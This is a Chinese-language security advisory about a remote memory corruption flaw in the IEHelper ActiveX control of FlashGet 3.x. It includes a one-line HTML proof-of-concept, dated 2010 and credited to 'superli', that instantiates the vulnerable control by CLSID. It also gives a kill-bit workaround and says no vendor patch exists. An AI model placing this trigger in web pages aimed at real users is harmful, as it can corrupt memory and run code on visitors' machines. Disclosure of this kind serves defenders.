Flashget IEHelper控件远程内存破坏漏洞

受影响系统:

Amazesoft FlashGet 3.x

描述:


FlashGet是一款多线程下载程序。

FlashGet所安装的IEHelper ActiveX控件在处理对象的实例化时存在问题,用户受骗访问了包含恶意对象实例化代码的网页就可以触发内存破坏,可能导致执行任意指令。

<*来源:superli (superli@Safe-mail.net
  *>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# Exploit Title:flashget 3.x IEHelper remote exec 0day poc
# Date: 2010.01.05
# Author: superli
# Version: 3.x
# Tested on: xp sp3
# Code :
<object id=TestObj classid="CLSID:{C6262DCE-6E64-45D2-B080-801F1E298AC2}" style="width:100;height:350"></object>

建议:


临时解决方法:

* 为CLSID {C6262DCE-6E64-45D2-B080-801F1E298AC2}设置kill-bit。

厂商补丁:

Amazesoft
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.amazesoft.com/

发表评论?

0 条评论。

发表评论